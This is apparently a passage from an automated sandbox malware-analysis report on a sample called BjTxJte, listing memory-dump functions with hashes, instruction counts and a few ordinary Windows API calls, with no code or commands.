                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e2a0515d0eec19aca8a64ff527043a97d8eb972f9833adca34b4d32d9dd3fd35
                                                                                      • Instruction ID: 1fef1ab5d5837d42583cef35138f312e4f3771a8ef409be6c61716300e3f5ab1
                                                                                      • Opcode Fuzzy Hash: e2a0515d0eec19aca8a64ff527043a97d8eb972f9833adca34b4d32d9dd3fd35
                                                                                      • Instruction Fuzzy Hash: E011A532B001295FDF94E678D8146AF73FAEBC8710B00853AD50AEB344DE35DC4287A1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682F1C3 Relevance: .1, Instructions: 56COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a6fe5fd507ba99f8ef129f50e042b3fef80af765912aaadad7576d01f8254f6a
                                                                                      • Instruction ID: a1cc02b1250d2d20a0473c47ba6204a542a5c0bcda383908be3ce992f65452e9
                                                                                      • Opcode Fuzzy Hash: a6fe5fd507ba99f8ef129f50e042b3fef80af765912aaadad7576d01f8254f6a
                                                                                      • Instruction Fuzzy Hash: 21014775B141214FCB26C67D985072FB7E6DBCB214F14846EE70ACB381DA21DC4383A6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06823C98 Relevance: .1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 83ccd2fbf2a9b0d61dcbd06c2fd37cdb71e721843ed1fe74c0e4d3041a4cfd7c
                                                                                      • Instruction ID: c0fed9dec42f7cdd7ce8663351559b8f1222a0f0b71c468db5542f3e4a4f2c7d
                                                                                      • Opcode Fuzzy Hash: 83ccd2fbf2a9b0d61dcbd06c2fd37cdb71e721843ed1fe74c0e4d3041a4cfd7c
                                                                                      • Instruction Fuzzy Hash: 2221E3B1D01269AFCB00DF9AD884ACEFFB4FB49320F10812AE558B7210C374A544CBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0114D3B7 Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4120375886.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_114d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction ID: 9cd658497f1124d00012502761982821c98aa4846968fb80c117d3fe59f8e9e2
                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction Fuzzy Hash: D011D075504240CFDF06CF54E5C4B55BF61FB44714F28C6AAD8494B656C33AE40ACB51
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0114D03F Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4120375886.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_114d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction ID: 646b60f3ccf01c8585af501e250b154b58bf893a4021273e9710d24862e3fa4c
                                                                                      • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                      • Instruction Fuzzy Hash: ED11BB75504284CFDF16CF64D9C4B16BFA2FB88714F24C6AED8494B252C33AD44ACB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0114D207 Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4120375886.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_114d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                      • Instruction ID: 9bde9a155317350e19887b1b5227bc2f1b92f50a359be2f8dc5f18b169f3903d
                                                                                      • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                      • Instruction Fuzzy Hash: 3E11DD76504284CFDF06CF54E5C4B16BFA1FB84624F24C6AAD8490B646C33AD40ACBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682A31B Relevance: .1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7c57d3dd654639c5b53b50f69d6914f3841f1624a3c2f0afaf33a399cb4bee4c
                                                                                      • Instruction ID: dcd67d250f9a99d901fec93d5eacfbc5db9b219d11a80cce8e0139315e8cdf59
                                                                                      • Opcode Fuzzy Hash: 7c57d3dd654639c5b53b50f69d6914f3841f1624a3c2f0afaf33a399cb4bee4c
                                                                                      • Instruction Fuzzy Hash: 3F01D431B141221FDB65E679D85471EBBD6EF8B214F14C46EE20ACB351DA21EC428391
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06823CA0 Relevance: .1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c273fe4af046ec62122be21c99fcb8296f3111a8c0a949844d21ac2be905ab72
                                                                                      • Instruction ID: cf03c3a7a662260576104ad22b93dcff476bb2b45e16b66dfe6791f349250695
                                                                                      • Opcode Fuzzy Hash: c273fe4af046ec62122be21c99fcb8296f3111a8c0a949844d21ac2be905ab72
                                                                                      • Instruction Fuzzy Hash: 6C11B3B5D01259AFCB00DF9AD884ADEFFB4FB49314F10852AE518B7240C375A954CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06824228 Relevance: .1, Instructions: 51COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b2f529f9edb0d46081e57edf62f594fb1bef874455b856ac9de7afde81f1898b
                                                                                      • Instruction ID: ba345e5af33593fa19cf05e76ed48e5be34034cac4c63965dd2e02179b3cbcfa
                                                                                      • Opcode Fuzzy Hash: b2f529f9edb0d46081e57edf62f594fb1bef874455b856ac9de7afde81f1898b
                                                                                      • Instruction Fuzzy Hash: D1016D71B200221BDB6496AEE45471FA2DBDBC9614F208439E60EC7344DEA1DC4243A5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682F1D0 Relevance: .0, Instructions: 49COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 874228f9f37e22371d92a1796af14f03079c29113f1a7dea0a3707a5c6d725cf
                                                                                      • Instruction ID: 95abef9f2bae6edd13ec91a6d4976d4df61f4f36da4e64571dbc9087cb5c176e
                                                                                      • Opcode Fuzzy Hash: 874228f9f37e22371d92a1796af14f03079c29113f1a7dea0a3707a5c6d725cf
                                                                                      • Instruction Fuzzy Hash: 3A01A475B101215BCB65967DE85472F62EAE7CE614F10843DE70BC7344DE21DC438395
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682A328 Relevance: .0, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0ec6a14a3ad1de0820b882541f16cb0baaec8cee22f5d4ad099c162284df0e6f
                                                                                      • Instruction ID: 3b61944f75be0189441f58dc116ee95721be54bbe41f830c2447ac73351b660c
                                                                                      • Opcode Fuzzy Hash: 0ec6a14a3ad1de0820b882541f16cb0baaec8cee22f5d4ad099c162284df0e6f
                                                                                      • Instruction Fuzzy Hash: F001A431B101221FDB68EA6DE85471EB7DAEF8A714F508439E60ECB354EE21EC424385
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682C7F0 Relevance: .0, Instructions: 40COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 393dc19c96131451f9fdc5a7feb91e3baa1c1095dc9e8746ee36aa84fc7b4bae
                                                                                      • Instruction ID: fa38a09ffe0a8dddf11cab3fc40a1d1caf1793582c3bbe71581bfdac5786a4f0
                                                                                      • Opcode Fuzzy Hash: 393dc19c96131451f9fdc5a7feb91e3baa1c1095dc9e8746ee36aa84fc7b4bae
                                                                                      • Instruction Fuzzy Hash: A8F0F032B212795BCBA45A69DC019AEB726E780668F104069EA01F7245DA62A840C6C0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06826489 Relevance: .0, Instructions: 30COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c96046b6ae4d5949f7f3a556df8b72d647e2e2deb62c2c4b37b7548bacebc615
                                                                                      • Instruction ID: 00bbf49b07c84ad9693d4dd25739ba5324cb62b5716876445ff4f61c0b89ae0a
                                                                                      • Opcode Fuzzy Hash: c96046b6ae4d5949f7f3a556df8b72d647e2e2deb62c2c4b37b7548bacebc615
                                                                                      • Instruction Fuzzy Hash: 1DF0E571E042199FCB60CBA8C85135FBB79EB82208F2585D5C148DB202E236EDC687C1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 068276B0 Relevance: 13.0, Strings: 10, Instructions: 468COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2222239885
                                                                                      • Opcode ID: 5dcf119effd84608752cbadd7129340f1405e2e1192eade3193500f9b466ada4
                                                                                      • Instruction ID: 67776204d13be6e19186beb1303b6e967495ad80b064bc52179a5d78178bed7a
                                                                                      • Opcode Fuzzy Hash: 5dcf119effd84608752cbadd7129340f1405e2e1192eade3193500f9b466ada4
                                                                                      • Instruction Fuzzy Hash: E0120B30E0022A8FDB68DF65C954AAEB7B2BF84704F208569D50AEB355DB309D85CF91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682A950 Relevance: 10.2, Strings: 8, Instructions: 229COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-3823777903
                                                                                      • Opcode ID: 153e9464164bb87f281a6d77883fe4b63ed4adb1e5c261be09b9421aa19f1b7b
                                                                                      • Instruction ID: eb134e4d50995ba43b622f366fbb56dd4e6bcdfff7e68034055e976ead8b7a9f
                                                                                      • Opcode Fuzzy Hash: 153e9464164bb87f281a6d77883fe4b63ed4adb1e5c261be09b9421aa19f1b7b
                                                                                      • Instruction Fuzzy Hash: ED915D30E1021A9FDB68EF65D994B6EBBF2BF44704F108529E502EB358DB359C85CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068270B0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-390881366
                                                                                      • Opcode ID: bd92aecc6eb6118efd2c61f1bc9190910c50640d0c7a1dc9d90bfb7a92ce38fc
                                                                                      • Instruction ID: ff1cfde0287ef444e8a99f3ddeaccd299b69b5f496e127791e0c447044f0af5a
                                                                                      • Opcode Fuzzy Hash: bd92aecc6eb6118efd2c61f1bc9190910c50640d0c7a1dc9d90bfb7a92ce38fc
                                                                                      • Instruction Fuzzy Hash: 7DF14030A1021ACFDB59EF69D594A6EBBB3FF84304F208529D5059B369DB31EC86CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682BA30 Relevance: 7.7, Strings: 6, Instructions: 197COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2392861976
                                                                                      • Opcode ID: 9d46cc3ac83c066098e2d3dded7f825145ad71047938eb6e03889681a1c5a2ae
                                                                                      • Instruction ID: 980274da0904bb49fa3fd8c0f1ef8a15eccc45216e6a093138167eaf96402bc0
                                                                                      • Opcode Fuzzy Hash: 9d46cc3ac83c066098e2d3dded7f825145ad71047938eb6e03889681a1c5a2ae
                                                                                      • Instruction Fuzzy Hash: 5371AF70E0122A8FDB68DF68D58466EB7E2FF84708B108529D406EB358DB71DD86CB81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 068283E8 Relevance: 5.3, Strings: 4, Instructions: 282COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2125118731
                                                                                      • Opcode ID: 20ede931315166801535f8fbafd0c00f0f51e1fa1f15931ac2012085493e5f64
                                                                                      • Instruction ID: 3a075cbe327aa384fdaa95344632815156e70ef90cf7bc461627c99f9a97e1bb
                                                                                      • Opcode Fuzzy Hash: 20ede931315166801535f8fbafd0c00f0f51e1fa1f15931ac2012085493e5f64
                                                                                      • Instruction Fuzzy Hash: 5CB15B70A1021A8FDF68EB68D58466EB7B3FF84304F248829D505DB359DB74DC8ACB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 06828800 Relevance: 5.2, Strings: 4, Instructions: 168COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LR^q$LR^q$$^q$$^q
                                                                                      • API String ID: 0-2454687669
                                                                                      • Opcode ID: 519c440ee6691afaf204b788fa2398c9124a5feda4b9af36171018faff01cd7b
                                                                                      • Instruction ID: 8a253ddc96e8370d442c8ab918219b84956b99494d0c947f826da766bcfc6cd9
                                                                                      • Opcode Fuzzy Hash: 519c440ee6691afaf204b788fa2398c9124a5feda4b9af36171018faff01cd7b
                                                                                      • Instruction Fuzzy Hash: D551A071B102168FDF58EB28C990A6EB7E2FB84304F148569D516DB399DB30EC88C795
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0682ACDB Relevance: 5.2, Strings: 4, Instructions: 165COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.4170654310.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_6820000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $^q$$^q$$^q$$^q
                                                                                      • API String ID: 0-2125118731
                                                                                      • Opcode ID: 5301eef2c7e324ed7f70d4a5d863ecf02d44bf2dc1ad0df0850e43effb34a78f
                                                                                      • Instruction ID: c590f2b6dd2aebfffc34dcf860ab9146e3431af549ca33bebd4cdd0d7b033fc9
                                                                                      • Opcode Fuzzy Hash: 5301eef2c7e324ed7f70d4a5d863ecf02d44bf2dc1ad0df0850e43effb34a78f
                                                                                      • Instruction Fuzzy Hash: B151A534E102168FDF69DB64D980AAEB7B2EF84311F14452AD905DB359DB31EC86CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:6.3%
                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:20
                                                                                      Total number of Limit Nodes:3
                                                                                      execution_graph 21167 12edd88 21168 12edd9c 21167->21168 21170 12eddc1 21168->21170 21171 12ecea8 21168->21171 21172 12edf48 LoadLibraryExW 21171->21172 21174 12edfc1 21172->21174 21174->21170 21156 5345fa8 21157 5345fcc 21156->21157 21158 5345fd3 21156->21158 21162 5345ffa 21158->21162 21163 5343bbc 21158->21163 21160 5345ff0 21161 5343bbc GetCurrentThreadId 21160->21161 21161->21162 21164 5343bc7 21163->21164 21165 5346310 GetCurrentThreadId 21164->21165 21166 53462fa 21164->21166 21165->21166 21166->21160 21152 12edce0 21153 12edd28 GetModuleHandleW 21152->21153 21154 12edd22 21152->21154 21155 12edd55 21153->21155 21154->21153

                                                                                      Executed Functions

                                                                                      Function 012ECEA8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 882 12ecea8-12edf88 884 12edf8a-12edf8d 882->884 885 12edf90-12edfbf LoadLibraryExW 882->885 884->885 886 12edfc8-12edfe5 885->886 887 12edfc1-12edfc7 885->887 887->886
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,012EDDC1,00000800,00000000,00000000), ref: 012EDFB2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000014.00000002.1930942407.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_20_2_12e0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 2cac5503ae5500777185259a39f18ae54990f6efc44a9ae47a952b00e53d0bf4
                                                                                      • Instruction ID: fa1e633721c2c502d74d0b93327b8bb569beec61b0023f3588a93698dd1d2609
                                                                                      • Opcode Fuzzy Hash: 2cac5503ae5500777185259a39f18ae54990f6efc44a9ae47a952b00e53d0bf4
                                                                                      • Instruction Fuzzy Hash: E01123B6D003498FDB10CF9AC448ADEFBF4EB88314F10842AE919A7250C3B5A544CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 012EDCE0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 890 12edce0-12edd20 891 12edd28-12edd53 GetModuleHandleW 890->891 892 12edd22-12edd25 890->892 893 12edd5c-12edd70 891->893 894 12edd55-12edd5b 891->894 892->891 894->893
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 012EDD46
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000014.00000002.1930942407.00000000012E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012E0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_20_2_12e0000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID: HandleModule
                                                                                      • String ID:
                                                                                      • API String ID: 4139908857-0
                                                                                      • Opcode ID: b02946dfab19e47b55183ea0efee2ee836f4b961dd55b612511cf294478a9e3b
                                                                                      • Instruction ID: ba477e504879743d43de974c1ddf90a5b5146a3d71ebd17fb5fd6a2b4d7c6861
                                                                                      • Opcode Fuzzy Hash: b02946dfab19e47b55183ea0efee2ee836f4b961dd55b612511cf294478a9e3b
                                                                                      • Instruction Fuzzy Hash: CF110FB6C002498FDB10DF9AD448ADEFBF4AF88324F10842AD518A7210C37AA545CFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0100D06C Relevance: .1, Instructions: 77COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000014.00000002.1930276681.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_20_2_100d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0ce5600fb3919d5de26e62f4550cd010f7dbfd3710edd133dd46bcb4ab76e187
                                                                                      • Instruction ID: 1c7c4ce7b6339bde266c346ce3a9b433c7105e79234584f7328e8fc1447fde41
                                                                                      • Opcode Fuzzy Hash: 0ce5600fb3919d5de26e62f4550cd010f7dbfd3710edd133dd46bcb4ab76e187
                                                                                      • Instruction Fuzzy Hash: C3213871100200EFEB06DFD4D9C0B2ABFA5FB88314F20C1A9E9490B296C73AC416CB71
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0101D2F0 Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000014.00000002.1930365303.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_20_2_101d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9aeca75726881bbfd87027253716fcc2b934cdf25d6bcf87c79eea9cf7add713
                                                                                      • Instruction ID: 40a56f2f7e010db8054932ba07242a64d5016efb8148d77327a744d5a6d39e6f
                                                                                      • Opcode Fuzzy Hash: 9aeca75726881bbfd87027253716fcc2b934cdf25d6bcf87c79eea9cf7add713
                                                                                      • Instruction Fuzzy Hash: AB2107B1604204DFDB05DF58D5C8B2ABBA5FB84314F20C5ADD8894B25AC37ED446CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0101D01C Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000014.00000002.1930365303.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_20_2_101d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ce4485a415116cff3567d8f035297273c8f11ffabee5a0695252781eb0c1dc94
                                                                                      • Instruction ID: 4b870643c2386a82b6f1b4ffb2ebe2078e377a412898d089409edce9e7377ff3
                                                                                      • Opcode Fuzzy Hash: ce4485a415116cff3567d8f035297273c8f11ffabee5a0695252781eb0c1dc94
                                                                                      • Instruction Fuzzy Hash: 2F212575504200DFCB16DF58D988B16BFA5FB84314F20C5ADE9894B25AC33AD447CB61
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0100D067 Relevance: .1, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000014.00000002.1930276681.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_20_2_100d000_BjTxJte.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                      • Instruction ID: c1651eb9a1918a8305cbf65cc9a3ea191aabde4836a43d804fe824e30a5f7861
                                                                                      • Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
                                                                                      • Instruction Fuzzy Hash: 2321A276504284DFDB06CF94D9C4B56BFB2FB88314F24C6A9DD490B256C33AD426CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0101D017 Relevance: .1, Instructions: 53COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
